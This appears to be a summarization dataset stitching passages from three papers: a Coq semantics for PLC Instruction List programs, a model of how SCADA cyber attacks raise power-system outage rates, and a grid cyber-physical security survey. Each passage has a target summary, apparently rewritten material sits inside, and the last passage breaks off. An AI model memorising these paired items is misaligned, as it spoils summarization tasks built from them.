  | ANDN op => state_up s 0 (BofN s.1 && ~~ BofN (s op))
  | ORN op => state_up s 0 (BofN s.1 || ~~ BofN (s op))
  | ADD op => state_up s 0 (s.1 + s op)
  | MUL op => state_up s 0 (s.1 * s op)
  | SUB op => state_up s 0 (s.1 - s op)
  | GT op => state_up s 0 (s.1 < s op)
  | GE op => state_up s 0 (s.1 <= s op)
  | EQ op => state_up s 0 (s.1 == s op)
  | TON q et pt =>
      if BofN s.1 then
        let s := state_up s et.+1 (s.2 et + delta) in
        if s.2 et < pt then state_up s q.+1 0
        else state_up s q.+1 1
      else let s := state_up s et.+1 0 in state_up s q.+1 0
  | _ => s
  end.

Figure 6. IL instructions evaluation function

It follows the inference rules given in Figure 4. The function eval_instr takes two arguments, a state and an instruction, and returns a new state. For example, the evaluation of a load instruction returns an updated state in which the current register is equal to the value of the instruction operand. Another example is given by the set instruction SR x: the variable x is updated with the disjunction of its previous value and the value of the current register. For the operators that are defined only for boolean values (like SR, AND, ...), we use the function BofN, which returns the original boolean value of a boolean variable that was translated to a natural number.
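A hypothetical miniature of eval_instr for three representative instructions, written in Python rather than Coq, may help in reading Figure 6. All names here are illustrative, and `bofn` mirrors the 0/nonzero boolean coercion described above.

```python
# Illustrative sketch (not the paper's code): a state is (register, env-dict),
# and bofn maps a natural number back to a boolean (0 -> False, else True).
def bofn(n):
    return n != 0

def eval_instr(state, instr):
    reg, env = state
    op, arg = instr
    if op == "LD":                       # register := operand value
        return (env[arg], env)
    if op == "ST":                       # variable := register
        new_env = dict(env)
        new_env[arg] = reg
        return (reg, new_env)
    if op == "AND":                      # register := register AND operand
        return (int(bofn(reg) and bofn(env[arg])), env)
    return state                         # other instructions omitted
```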
In the definition of Figure 6 and the following definitions, we use the SSReflect notation for the successor of a natural number: x.+1 corresponds to the successor of x, i.e. x + 1.

Configurations transition: The IL configurations, presented in Section III-D, are encoded as a Coq product type.

Inductive ILmode := I | O | E.
Definition ILConf := nat * State * nat * ILmode.

In a configuration, the cycle identifier and the location are represented by natural numbers. The execution mode is represented by an element of the inductive type ILmode. The elements of this finite type correspond to the three modes we defined previously in Section III-D.

Since our IL semantics is deterministic, we define the configurations transition relation as a function. The Coq definition is given in Figure 7.

Definition instr_succ (i : Instr) x (s : State) : nat :=
  match i with
  | JMP l => l
  | JMPC l => if BofN s.1 then l else x.+1
  | JMPCN l => if ~~ BofN s.1 then l else x.+1
  | _ => x.+1
  end.

Definition transition (Cf : ILConf) :=
  match Cf with (c, s, l, m) =>
    match m with
    | I => let s := state_up_seq s pi (p_ival c) in (c, s, l, E)
    | O => (c.+1, s, l, I)
    | E => let I := nth RET P l in
           if I == RET then (c, s, 0, O)
           else (c, eval_instr s I, instr_succ I l s, E)
    end
  end.

Figure 7. IL configurations transition function

The transition function proceeds by looking at the mode of the configuration passed as argument. If it is an input mode, the variables state function is updated with the new values of the input variables and the mode is changed to execution. The function state_up_seq is a generalization of the state updating function state_up that updates a list of variables. When the original configuration has an output mode, the cycle identifier is incremented and the mode is changed to input. These two cases correspond to the inference rules Input and Output of Figure 4. When the configuration mode is execution, the transition function first checks the instruction corresponding to the current configuration.
This instruction corresponds to the l-th element of the list of instructions of the code P. We use here the generic function nth from the SSReflect seq library. If the element at position l of P is equal to RET, then the rule RET of Figure 4 is applied. Otherwise, the cycle and the mode are not modified: the variables state is updated using the function eval_instr, and the configuration location is updated using the function instr_succ, which returns the successor of a location according to the corresponding instruction and the state of the current register.

Program executions: After the definition of the IL configuration transition function, we define a program execution as the transitive closure of the transition relation. Since it is not always possible to know how many transitions are needed to execute an IL program, we define the program execution as a propositional relation rather than a computational function. The definition of exec is given in Figure 8.

Inductive exec (c1 c2 : ILConf) : Prop :=
| exec_step : transition c1 = c2 -> exec c1 c2
| exec_star cf : transition c1 = cf -> exec cf c2 -> exec c1 c2.

Lemma exec_splitI_prodl : forall c n s0 s,
  exec (c, s0, 0, I) (c + n.+1, s, 0, O) ->
  exists r, exec (c, s0, 0, I) (c, r, 0, O)
         /\ exec (c.+1, r, 0, I) (c + n.+1, s, 0, O).

Lemma exec_splitI_prodr : forall c n s0 s,
  exec (c, s0, 0, I) (c + n.+1, s, 0, O) ->
  exists r, exec (c, s0, 0, I) (c + n.+1, r, 0, I)
         /\ exec (c + n.+1, r, 0, I) (c + n.+1, s, 0, O).

Figure 8. IL program execution definition and lemmas

It corresponds to the standard transitive closure predicate. In addition to this definition, we prove some generic properties about any program execution.
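Operationally, since transition is deterministic, what exec expresses can be pictured as iterating the transition function from a start configuration until a target configuration is reached. The bounded Python sketch below is an assumption of this rewrite (the step bound stands in for the unbounded closure, and the names are illustrative):

```python
# Illustrative sketch: exec c1 c2 holds iff c2 is reachable from c1 in at
# least one application of the deterministic transition function. Like the
# exec predicate, reaching the target requires one or more steps, so a
# configuration is not trivially considered reachable from itself.
def exec_reaches(transition, start, target, max_steps=10_000):
    conf = start
    for _ in range(max_steps):
        conf = transition(conf)
        if conf == target:
            return True
    return False
```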
The first lemma of Figure 8 states that if the execution of a program starting from the configuration (c, s0, 0, I) ends at the configuration (c + n.+1, s, 0, O), it must come through a configuration where the cycle is the first execution cycle and the mode is output. The second lemma states the same property but for the last execution cycle. The proofs of these two lemmas are straightforward: they use induction and the monotonicity of the exec relation with respect to cycles. Using our IL semantics, we formalized a simple example of a PLC program and proved some properties about it. This is presented in the following sub-section.

C. Example

We formalized a simple example of a PLC program written in the IL language. It is one of the examples given in the book Programmable Logic Controllers [10].

Description: We consider the example of a PLC program for opening and closing a car park entrance barrier. The barrier is opened when the correct amount of money is inserted in the collection box, and it stays open for 10 seconds. The program has three inputs and two outputs. The first input is associated with a sensor in the collection box. When the barrier is down it trips one switch, and when up it trips another; these switches are associated with the two other input variables of the program and give the position of the barrier to the program. The opening and closing of the barrier is managed by a valve-piston system, and the two program outputs are associated with the two valves of this system. The program source

Inputs: X400 (I0), X401 (I1), X402 (I2)
Outputs: Y430 (Q0), Y431 (Q1)

LD X400
OR Y430
ANI M100
ANI Y431
OUT Y430
LD X401
OUT T450 K10
LD T450
OUT M100
LD M100
OR Y431
ANI X402
ANI Y430
OUT Y431
END

Definition P1 := [:: LD I0; OR Q0; ANDN T0; ANDN Q1; ST Q0;
                     LD I1; TON T0 ET0 PT; LD T0; OR Q1;
                     ANDN I2; ANDN Q0; ST Q1; RET ].

Figure 9.
Car barrier program in Mitsubishi format and in Coq

in the Mitsubishi format, which does not follow the standard, and the corresponding Coq definition are presented in Figure 9. The output Q0 for raising the entrance barrier is activated when the input I0 is activated. It remains on until the timer output variable T0 is activated, which happens when the input I1, indicating that the barrier is up, remains on for 10 seconds. At the end of the time delay the output Q1 is activated, telling the valve-piston system to lower the barrier. In a normal state, the input variables I1 and I2 should have opposite boolean values; when they have the same value, the barrier is in the process of being lowered or raised.

Properties: We formalized and proved some safety properties about the IL program presented above. For example, Figure 10 shows two lemmas that prove properties about the output Q0 and the timer output T0.

Lemma barrier_open : forall c s0 s,
  exec (c, s0, 0, E) (c, s, 0, O) ->
  BofN (s Q0) = (BofN (s0 I0) || BofN (s0 Q0))
                && ~~ BofN (s0 T0) && ~~ BofN (s0 Q1).

Lemma timer_on : forall c s0 s,
  exec (c, s0, 0, E) (c, s, 0, O) ->
  BofN (s T0) = BofN (s0 I1) && (PT <= (s0 ET0)).

Figure 10.

The lemma barrier_open states that after one cycle of execution, the output Q0 will be on if the input I0 was on at the input phase or Q0 was on in the previous cycle, and the timer output and the output Q1 were off during the previous cycle. The lemma timer_on states that the timer output will be on if and only if the input I1 is on and the elapsed time is greater than or equal to the predefined time delay. The proofs of these two lemmas are straightforward and proceed by case analysis over the inductive predicate exec.

V.
Related works

There are numerous publications on the use of formal methods for the verification of PLC programs. Model checking is the most used approach in these verification works. In [2] a semantics of IL is defined using timed automata. The language subset contains TON timers but data types are limited to booleans; the formal analysis is performed by the model checker UPPAAL. In [3] an operational semantics of IL is defined. A significant subset of IL is supported by this semantics, but it does not include timer instructions. The semantics is encoded in the input language of the model checker Cadence SMV, and linear temporal logic (LTL) is used to specify properties of PLC programs. Abstract interpretation techniques are also used for the verification of PLC programs: in [5] an operational semantics of IL is defined and used to perform abstract interpretation of IL programs with a prototype tool called HOMER. In the theorem proving community, there has been some work on the formal analysis of PLC programs. In [4] the theorem prover HOL is used to verify PLC programs written in the FBD, SFC and ST languages; in this work, modular verification is used for compositional correctness and safety proofs of programs. In the Coq system, an example of verification of a PLC program with timers is presented in [11]. A quiz machine program is used as an example in this work, but no generic model of PLC programs is formalized. There is also a formalization of a semantics3 of the LD language in Coq. This semantics supports a subset of LD that contains branching instructions. This work is a component of a CDK environment for PLC.

VI. Conclusions and future work

Our goal is to develop a formally verified compiler and a verification tool for PLC programs. This requires a formal semantics of PLC programming languages. In this paper we presented a formal semantics of PLC programs written in the IL language.
This semantics covers a large subset of IL instructions that includes timers. We formalized this semantics in the type-theory-based theorem prover Coq and used it to prove some safety properties of a simple example of a PLC program. The proofs of these properties are straightforward and require only some basic knowledge of the Coq system. Although our main goal is the development of a certified PLC compiler, this work can also be used for formally proving properties of IL programs. In the short term, the perspectives of our work are the following:

- Developing a certified compiler front-end for PLC. We plan to formalize and certify a transformation of PLC programs written in the LD language to IL.
- Integrating our formal semantics of IL with the formal semantics of the meta language SFC [12]. This will allow us to prove safety properties of industrial examples of PLC programs written in SFC.

In the long term, the work on the certified compiler front-end opens the way to the development of a certified compilation chain for PLC. This chain can be built on top of the CompCert compiler and use the BIP [13] framework as an intermediate language. We also plan to develop a static analysis tool for PLC programs.

3 Research report in Korean available at: http://pllab.kut.ac.kr/tr/2009/ldsemantics.pdf
Summary:
Programmable Logic Controllers (PLCs) are embedded systems that are widely used in industry. We propose a formal semantics of the Instruction List (IL) language, one of the five programming languages defined in the IEC 61131-3 standard for PLC programming. This semantics supports a significant subset of the IL language that includes on-delay timers. We formalized this semantics in the proof assistant Coq and used it to prove some safety properties on an example of a PLC program.
Summarize:
Keywords: power system reliability; SCADA system; cyber security; forced outage rate; loss of load probability.

I. INTRODUCTION

Drastic technological innovation has enabled the power system to be more flexible and to accommodate a more open architecture to fulfill the requirements of the modern power industry [1]. Also, as communication technology plays a crucial role in improving the efficiency of information management in the power system, more communication protocols and network structures are being investigated, which provides the power system with a more open development environment. Nowadays, the supervisory control and data acquisition (SCADA) system is an important part of the power grid, collecting data from remote facilities and sending back control commands. As the power grid becomes more complex and tightly coupled with the SCADA system, the resilience of the power system becomes susceptible, since the power grid turns out to be more vulnerable to external cyber attacks than to internal operational errors [2]. Thus, it is crucial to analyze the vulnerability incurred by cyber attacks between the SCADA and power systems and to quantify the impacts of the attacks. However, although the security problem of the SCADA and power systems has been present for several years, due to the lack of quantification efforts [3] and the limited work on integrated analysis of both the SCADA system and the power system, an evaluation of the actual impact of cyber attacks on power supply adequacy has been lacking thus far. In order to conduct such an evaluation, it is necessary to quantitatively study the severity of cyber attacks so as to identify cascading failures in the cyber domain [3]. Since the power system is directly controlled by the SCADA system, it is useful to analyze the effects of cyber attacks on the SCADA system so that their impacts on the power system can be derived.
Thus, typical attacks launched against the SCADA system should be identified and their types classified. Also, attacks targeting the control and communication functions of the SCADA system will yield different levels of risk to the power system. For instance, a worm infection in the control subsystem of the SCADA system may shut down the whole SCADA, while some attacks may only slightly increase the vulnerabilities of the SCADA system. The influences of these attacks on the SCADA will incur different impacts on the power system. Furthermore, it is crucial to assess the realistic effects of various attacks on the components of the power grid based on their corresponding attack models. The generators, transmission lines, and loads in the power grid have different probabilities of failure, and these probabilities may differ significantly due to the reliability characteristics of their elements. Therefore, by studying the reliability characteristics of various components and the probabilistic models of different attacks on the SCADA system, the impacts on the reliability of the components in the power grid can be evaluated, and the corresponding protection schemes can be decided. In this paper, by considering typical cyber attacks and their effects on the SCADA system, as well as the impacts of these attacks on different components of the power system, a forced outage rate (FOR) model is proposed, and a reliability analysis is performed to derive loss of load probability (LOLP) curves using the FOR model in Monte Carlo simulation (MCS). The organization of this paper is as follows. In Section II, related work on cyber attacks on the SCADA system and on reliability analysis is discussed. Typical attacks on the SCADA system and the proposed FOR model are described and analyzed in Section III.
In Section IV, the LOLP curves in two reliability test systems are simulated and analyzed based on the MCS with the FOR values, and the paper is concluded in Section V. Proceedings of the 2013 IEEE International Conference on Cyber Technology in Automation, Control and Intelligent Systems, May 26-29, 2013, Nanjing, China. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply.

II. LITERATURE REVIEW

Since the power system is not only a network composed of generators and loads connected through transmission lines, but is overlaid with a communication and control system such as SCADA, which manages economic and secure operation [4], estimating the reliability of the power system and SCADA is both significantly complicated and necessary. A number of studies on the power system and SCADA have sought to characterize the impacts on the power system. A vulnerability assessment of the cyber security of the SCADA system controlling the power grid is illustrated in [5]. Two models of the SCADA system, a firewall model and a password model, are generated for the simulation of attacks. The firewall model is used to regulate the packets between networks, while the password model is applied to monitor penetration attempts. With these two models, vulnerabilities of the SCADA system are evaluated in two scenarios, with attacks from inside and outside the network, and the vulnerability indices for each model are calculated. A similar investigation of vulnerability evaluation was conducted in [6] using an attack tree approach. A reachability framework is developed in [2] to perform safety analysis for a two-area power system. An attack targeting the power system by gaining access to the Automatic Generation Control (AGC) can be identified using the reachability framework.
However, this approach focuses on the two areas of the power system rather than on the SCADA system. The vulnerabilities of industrial control networks are reviewed and discussed in [7]. The threats to devices in the power system, such as Programmable Logic Controllers (PLC), Distributed Control Systems (DCS), and Human Machine Interfaces (HMI) in the SCADA system, are analyzed, and a series of protection policies is developed and applied to increase both the internal and external security of the network. And [8] gives a detailed review of the vulnerabilities and risks of various components of the electric power system. Since the security flaws of SCADA are considered the main vulnerable point for remote access through the Internet, a new communication standard is needed for the encryption devices between the SCADA RTU and the modem linked to the Internet. More of the literature focuses on the impacts of attacks or vulnerabilities on the SCADA system, which is highly related to the security of the entire power system. In [9] a model of the control system in SCADA is proposed to identify the most critical sensors and attacks for anomaly detection. Three mathematical models of stealthy attacks are simulated as intrusions into the control system, and it was found that protecting against integrity attacks is more important than protecting against DoS attacks; that is, integrity attacks lead to more severe impacts on the SCADA system. Similarly, [10] presented a risk assessment method using an Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) tool to evaluate the risk model, which identifies the severity levels of the threats and vulnerabilities in the control system. In [11], the Modbus DoS attack, which is composed of an email-based attack, a phishing attack, and a Modbus worm attack in SCADA, is analyzed for SCADA systems in the process network.
The Modbus worm attack is tested in a power plant testbed, which concluded that effective attacks should be launched with knowledge of the high-level architecture of the system. Also, it is found in [12] that about 78% of the incidents of external attacks between 2002 and 2006 were worms, viruses, and Trojan horses, and over 50% were worms. For instance, the Slammer worm has an extremely high infection rate, doubling in number every 8.5 seconds [13]. Furthermore, popular approaches for preventing risks and vulnerabilities, such as firewalls and intrusion detection systems, are evaluated in the SCADA network environment in [14], [15].

III. ATTACKS IN SCADA SYSTEM

There are multiple approaches to classifying the attacks in SCADA systems. In [13], three categories are distinguished based on the intention behind the attacks: intentional targeted attacks, unintentional consequences caused by worms and viruses, and unintentional consequences raised by internal causes. In our study, attacks are classified by the effects they bring to the SCADA system: confidentiality, integrity, and availability. Additionally, worms and viruses account for a large share of SCADA attack incidents and usually lead to the consequence of shutting down the whole system. They are therefore separated from the other attacks, and their occurrences and effects will be described in this section. When attacks occur in the SCADA system, the control or the communications of the SCADA will be influenced by the effects of one or several of these attacks. With failed controls from the SCADA, the management or the transmission of power may be affected in the power system. For example, a transmission line may be improperly tripped due to a relay setting modified by malicious intruders. This can be represented as an increase of the forced outage rate (FOR) values of the components in the power system.
FOR is a basic generating unit parameter for static capacity evaluation [16] and is used for forecasting the probability of a component being in the forced outage mode, which indicates an unavailability status. The FOR of components in the power system is given by (1):

FOR_new = FOR_old + P_i × D   (1)

In (1), FOR_old is the original FOR value of the two kinds of components considered, generators and transmission lines, in various power systems. P_i is the probability of one type of attack occurring in the SCADA system, where i is the type of each attack. D indicates the different impacts of the attacks with different probabilities of occurrence. From the record of external attack incidents between 2002 and 2006, DoS attacks account for the smallest share, 4% of the total; attacks capable of ruining confidentiality and integrity account for about 9%; and the largest share is generated by worms, viruses, and Trojan horses, which account for 78% of the total incidents, with three types of worms accounting for over 50% of the records [12]. Worms and viruses thus occupy a great portion of the recorded attacks, and the aspects impacted by them may be a combination of confidentiality, integrity, and availability; therefore, they are separated from the DoS attacks as well as from the confidentiality and integrity attacks. The rates of the attack distributions are generally denoted as P_i in this paper, but the values of P_i are variable, since the targets of attacks may change and the distributions of new attacks may differ from those of several years ago. These recorded rates are taken as the values of P_i, with some modifications of the rates for different attacks made by considering the changes of vulnerabilities and targets in the SCADA system.
D is represented by (2) and is influenced by three factors:

D = H × k × l   (2)

In (2), H indicates the risk level at which different components might be affected by the upcoming attacks. Two components of the power system, the generator and the transmission line, are considered to be at different risk levels. Since the generator is more centralized and easier to control and manage, the probability of increased vulnerability and risk from attacks is low. On the other hand, the transmission lines are constructed in a distributed mode and are more vulnerable to attacks. Thus two risk levels, low and high, are assigned to the generator and the transmission lines, with values normalized as 0.2 and 0.7. k is a coefficient indicating whether the attack is easy to generate and launch. Some attacks, such as worms, are easy to generate and spread within a very short time, so their corresponding values of k are labeled as high; other attacks, such as spoofing, are generated through complex steps and expensive equipment, so their values of k are set lower. And l implies the severity level of the impact that the attack may bring to the SCADA system. Attacks leading to immediate paralysis of the system are assigned higher l values, while attacks that bring only slight vulnerability to the SCADA have lower l values. In order to analyze the impact of cyber vulnerability on the power system through attacks on the SCADA, 10 typical attacks, which can leave vulnerabilities and risks in the DoS (availability), confidentiality, and integrity aspects of the SCADA system, are analyzed based on the classification and influencing elements discussed above. Also, since worms and viruses make up the largest part of all attacks, they are separated from the other attacks and considered as two additional types. The typical DoS attacks in the SCADA system are the e-mail based attack, the phishing attack, and spoofing.
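Equations (1) and (2), and the way the resulting FOR values feed a Monte Carlo LOLP estimate as described for Section IV, can be sketched together in Python. This is a hedged illustration, not the paper's code: the H value 0.7 comes from the text, but the k, l, and P_i numbers, the unit capacities, and the load are placeholder assumptions.

```python
import random

# Illustrative sketch (assumed names and numbers) of equations (1) and (2)
# and of a FOR-driven Monte Carlo LOLP estimate: each unit is sampled as out
# of service with probability equal to its FOR, and LOLP is the fraction of
# sampled system states whose surviving capacity falls below the load.
def impact(H, k, l):
    return H * k * l                      # equation (2): D = H * k * l

def new_for(old_for, p_i, d):
    return old_for + p_i * d              # equation (1): FOR_new = FOR_old + P_i * D

def estimate_lolp(capacities, fors, load, samples=20_000, seed=0):
    rng = random.Random(seed)
    short = 0
    for _ in range(samples):
        up = sum(c for c, q in zip(capacities, fors)
                 if rng.random() >= q)    # unit survives with probability 1 - FOR
        if up < load:                     # loss of load in this sampled state
            short += 1
    return short / samples

# Transmission-line risk level H = 0.7 (from the text); k, l and P_i are
# placeholder values for an easily launched, severe attack.
d_line = impact(0.7, 0.9, 0.8)
attacked_for = new_for(0.02, 0.5, d_line)  # 0.02 + 0.5 * 0.504 = 0.272
```

Raising any FOR value raises the estimated LOLP monotonically, which is how, in this sketch, an attack model would shift the LOLP curves.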
As its name suggests, the e-mail-based attack is launched through apparently legitimate access, by forging an e-mail with correct headers and contextual information. With DoS malware attached, the malicious payload is delivered to the target slaves once the malware is installed in the network, leading to a loss of synchronization between master and slave machines. The e-mail-based attack therefore has high values of both k and l. However, since pure DoS attacks are rarely implemented in the SCADA environment, and the e-mail-based attack can be blocked before it is delivered through the SCADA system, its occurrence is considered very rare, meaning its P value is very low. The phishing attack delivers, within malicious scripts, a website that leads to the download of DoS malware. Several steps are needed to launch this attack: first, a trick such as DNS poisoning makes the operator visit the website hosting the malicious scripts; the DoS malware is then downloaded and executed when the scripts are rendered; and finally, communications or control in the SCADA system are blocked by the DoS attack. Because launching a phishing attack involves combining it with other attacks, the process is not as simple as the e-mail attack, so its k value is labeled as the middle level. However, given its effect on the system, cutting off communication between components, its severity level is still high. Fortunately, the occurrence of this type of attack is also rare, so the P value of the phishing attack is very low. The last common DoS attack on the SCADA system is spoofing, also known as the replay attack [13].
By continuously transmitting commands to the controller and cutting off communication between devices, spoofing can produce undesirable results in both the SCADA system and the control devices of the power system; at the same time, crucial data from the controller or HMI may be modified. These effects give spoofing a high l value. However, this attack has the most difficult payload to operate, making spoofing one of the most complex attacks to execute, so its k value should be deemed low. Like the other DoS attacks, spoofing is rare in the overall record of attacks, so its P value is set the same as that of the phishing attack. The worm attack is a very effective and efficient technique for spreading malicious code through the SCADA system [11]. Based on the record of SCADA attacks from 2002 to 2006, over half of the attacks launched against SCADA systems were worms, namely the Slammer, Blaster, and Sasser worms. Worms spread to devices and lead to severe results such as backdoors in control components or other vulnerability issues. Once a machine is infected, the worm attempts to spread to new hosts and efficiently execute its malicious code; infection results show that all the slave machines can end up controlled by the worm [11]. In 2003, the Slammer worm disabled a safety monitoring system for about five hours and affected Windows servers and communication networks by blocking control-system traffic [13]. With these
Summary:
As power grids rely more on open communication technologies and the supervisory control and data acquisition (SCADA) system, they are becoming more vulnerable to malicious cyber attacks. The reliability of the power system can be impacted through the SCADA system by a diverse set of probable cyber attacks on it. This paper deals with the impact of cyber attacks on power system reliability. A forced outage rate (FOR) model is proposed considering the impacts of cyber attacks on the reliability characteristics of generators and transmission lines. Different occurrences of the cyber attacks targeting the SCADA system lead to different effects on the FOR values. The loss of load probability (LOLP) curves in two reliability test systems are simulated based on 10 different types of attacks on the SCADA system. The simulation results illustrate that the reliability of the power system decreases as the effects of cyber attacks on SCADA become severe.
|
Summarize:
KEYWORDS | Cyber physical systems (CPS); cyber security; electric grid; smart grid; supervisory control and data acquisition (SCADA)

I. INTRODUCTION

An increasing demand for reliable energy and numerous technological advancements have motivated the development of a smart electric grid. The smart grid will expand the current capabilities of the grid's generation, transmission, and distribution systems to provide an infrastructure capable of handling future requirements for distributed generation, renewable energy sources, electric vehicles, and the demand-side management of electricity. The U.S. Department of Energy (DOE) has identified seven properties required for the smart grid to meet future demands [1]. These requirements include attack resistance, self-healing, consumer motivation, power quality, generation and storage accommodation, enabling markets, and asset optimization. While technologies such as phasor measurement units (PMU), wide-area measurement systems, substation automation, and advanced metering infrastructures (AMI) will be deployed to help achieve these objectives, they also present an increased dependency on cyber resources which may be vulnerable to attack [2]. Recent U.S. Government Accountability Office (GAO) investigations into the grid's cyber infrastructure have questioned the adequacy of the current security posture [3]. The North American Electric Reliability Corporation (NERC) has recognized these concerns and introduced compliance requirements to enforce baseline cybersecurity efforts throughout the bulk power system [4]. Additionally, current events have shown attackers using increasingly sophisticated attacks against industrial control systems, while numerous countries have acknowledged that cyber attacks have targeted their critical infrastructures [5], [6].
A comprehensive approach to understanding security concerns within the grid must utilize cyber-physical system (CPS) interactions to appropriately quantify attack impacts [7] and evaluate the effectiveness of countermeasures. This paper highlights CPS security for the power grid as the functional composition of the following: 1) the physical components and control applications; 2) the cyber infrastructures required to support necessary planning, operational, and market functions; 3) the correlation between cyber attacks and the resulting physical system impacts; and 4) the countermeasures to mitigate risks from cyber threats. Fig. 1 shows a CPS view of the power grid. The cyber systems, consisting of electronic field devices, communication networks, substation automation systems, and control centers, are embedded throughout the physical grid for efficient and reliable generation, transmission, and distribution of power. The control center is responsible for real-time monitoring, control, and operational decision making. Independent system operators (ISOs) perform coordination between power utilities, and dispatch commands to their control centers. [Sridhar et al., Cyber Physical System Security for the Electric Power Grid. Manuscript received June 29, 2011; revised August 11, 2011; accepted August 12, 2011. Date of publication October 3, 2011; date of current version December 21, 2011. This work was supported by the National Science Foundation under Grant CNS 0915945. The authors are with the Department of Electrical and Computer Engineering, Iowa State University, Ames, IA 50011 USA (e-mail: sridhar@iastate.edu). Digital Object Identifier: 10.1109/JPROC.2011.2165269. Proceedings of the IEEE, Vol. 100, No. 1, January 2012.]
Utilities that participate in power markets also interact with the ISOs to support market functions based on real-time power generation, transmission, and demand. This paper addresses smart grid cybersecurity concerns by analyzing the coupling between the power control applications and the cyber systems. The following terms are introduced to provide a common language for these concepts throughout the paper: power application: the collection of operational control functions necessary to maintain stability within the physical power system; supporting infrastructure: the cyber infrastructure, including software, hardware, and communication networks. This division of the grid's command and control functions will be utilized to show how cybersecurity concerns can be evaluated and mitigated through future research. Attempts to enhance the current cybersecurity posture should explore the development of secure power applications with more robust control algorithms that can operate reliably in the presence of malicious inputs, while deploying a secure supporting infrastructure that limits an adversary's ability to manipulate critical cyber resources. The paper is organized as follows. Section II introduces a risk assessment methodology which incorporates both cyber and physical characteristics to identify physical impacts from cyber attacks. Section III presents a classification detailing the power applications necessary to facilitate grid control. Each power application contains a review of the information, communication, and algorithms required to support its operation; additionally, specific cybersecurity concerns are addressed for each application and potential physical impacts are explored. Section IV provides a review of current research efforts focusing on security enhancements for the supporting infrastructure. Finally, emerging research challenges are introduced in Section V to highlight areas requiring attention.
II. RISK ASSESSMENT METHODOLOGY

The complexity of the cyber-physical relationship can present unintuitive system dependencies. Performing accurate risk assessments requires the development of models that provide a basis for dependency analysis and for quantifying the resulting impacts. This association between the salient features of both the cyber and physical infrastructure will assist in the risk review and mitigation processes. This paper presents a coarse assessment methodology to illustrate the dependency between the power applications and the supporting infrastructure. An overview of the methodology is presented in Fig. 2. Risk is traditionally defined as the impact times the likelihood of an event [8]. Likelihood should be addressed through the infrastructure vulnerability analysis step, which assesses the supporting infrastructure's ability to limit an attacker's access to the critical control functions. Once potential vulnerabilities are discovered, the application impact analysis should be performed to determine the affected grid control functions. This information should then be used to evaluate the physical system impact.

[Fig. 1: Power grid cyber-physical infrastructure.]

A. Risk Analysis

The initial step in the risk analysis process is the infrastructure vulnerability analysis. Numerous difficulties are encountered when determining cyber vulnerabilities within control system environments due to the high availability requirements and dependencies on legacy systems and protocols [9].
A comprehensive vulnerability analysis should begin with the identification of cyber assets, including software, hardware, and communications protocols. Then, activities such as penetration testing and vulnerability scanning can be utilized to determine potential security concerns within the environment. Additionally, continued analysis of security advisories from vendors, system logs, and deployed intrusion detection systems should be utilized to determine additional system vulnerabilities. Common control system cyber vulnerabilities have been evaluated by the Department of Homeland Security (DHS) based on numerous technical and nontechnical assessments [10]. Table 1 identifies these vulnerabilities and categorizes whether they were found in industry software products, general misconfigurations, or within the network infrastructure. This list provides greater insight into likely attack vectors and also helps identify areas requiring additional mitigation research. After cyber vulnerabilities have been identified, the application impact analysis step should be performed to determine possible impacts to the applications supported by the infrastructure. This analysis should leverage the classification introduced in Section III to identify the impacted set of communication and control mechanisms. Once attack impacts on the power applications have been determined, physical impact analysis should be performed to quantify the impact on the power system. This analysis can be carried out using power system simulation methods to quantify steady-state and transient performance, including power flows and variations in grid stability parameters in terms of voltage, frequency, and rotor angle.

B. Risk Mitigation

Mitigation activities should attempt to minimize unacceptable risk levels. This may be performed through the deployment of a more robust supporting infrastructure or power applications, as discussed in Sections III and IV.
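The three assessment steps, combined with the traditional risk definition above (impact times likelihood), can be sketched as a small pipeline. All numeric scores and the scenario below are hypothetical illustrations, not values from the paper.

```python
# Sketch of the Fig. 2 methodology under risk = likelihood x impact [8].
# Each step's output is a stand-in for a real analysis product.

def risk(likelihood: float, impact: float) -> float:
    """Traditional risk definition: impact times likelihood."""
    return likelihood * impact

# Step 1: infrastructure vulnerability analysis -> likelihood of access
# (e.g., distilled from penetration tests and advisories; hypothetical).
p_access = 0.3

# Step 2: application impact analysis -> the affected control function
# (e.g., AGC), which Step 3 translates into a physical consequence.
# Step 3: physical impact analysis -> quantified consequence, e.g. MW of
# load lost from a power-flow simulation (hypothetical number).
mw_lost = 150.0

print(risk(p_access, mw_lost))
```

The point of the pipeline is the ordering: likelihood comes from the supporting infrastructure, impact from the power application and the physical system, and only their product is the risk to be mitigated.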
Understanding opportunities to focus on specific approaches, or to combine them, may present novel mitigation strategies. Numerous research efforts have addressed the cyber-physical relationship within the risk assessment process. Interdependency research by Laprie et al. focuses on analyzing escalating, cascading, and common-cause failures within the cyber-physical relationship [11]. State machines are developed to evaluate the transitions influenced by the interdomain dependencies; this research then shows how attack-based transitions can lead to failure states. A graph-based cyber-physical model has been proposed by Kundur et al. [12]. Here, graphs are analyzed to evaluate a control's influence on a physical entity, and the model is used to evaluate how power generation can be impacted by failures of, or attacks on, cyber assets. Additional research into computing the likely load loss due to a successful cyber attack has been performed by Ten et al. [13], [14]. This research uses probabilistic methods based on Petri nets and attack trees to identify weaknesses in substations and control centers, which can then be used to express load loss as a percentage of the total load within the power system.

[Table 1: Common control system vulnerabilities/weaknesses.]
[Fig. 2: Risk assessment methodology.]

III.
POWER SYSTEM CONTROL APPLICATIONS AND SECURITY

A power system is functionally divided into generation, transmission, and distribution. In this section, we present a classification of control loops in the power system that identifies the communication signals and protocols, machines/devices, computations, and control actions associated with select control loops in each functional classification. The section also sheds light on the potential impact of cyber attacks directed at these control loops on system-wide power system stability. Control centers receive measurements from sensors that interact with field devices (transmission lines, transformers, etc.). The algorithms running in the control center process these measurements to make operational decisions. The decisions are then transmitted to actuators to implement the changes on field devices. Fig. 3 shows a generic control loop that represents this interaction between the control center and the physical system. The measurements from sensors and the control messages from the control center are represented by y_i(t) and u_i(t), respectively. In the power system, the measured physical parameters y_i(t) may refer to quantities such as voltage and power. These measurements from substations, transmission lines, and other machines are sent to the control center using dedicated communication protocols. The measurements are then processed by a set of computational algorithms, collectively known as the energy management system (EMS), running at the control center. The decision variables u_i(t) are then transmitted to actuators associated with field devices. An adversary could exploit vulnerabilities along the communication links and create attack templates designed either to corrupt the content of these control/measurement signals (e.g., integrity attacks) or to introduce a time delay or denial in their communication (e.g., denial of service (DoS), desynchronization, and timing attacks) [15].
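The generic control loop and the effect of an integrity attack on the measurement signal y_i(t) can be sketched as follows; the first-order plant, the proportional controller, and the attack gain are hypothetical simplifications, not models from the paper.

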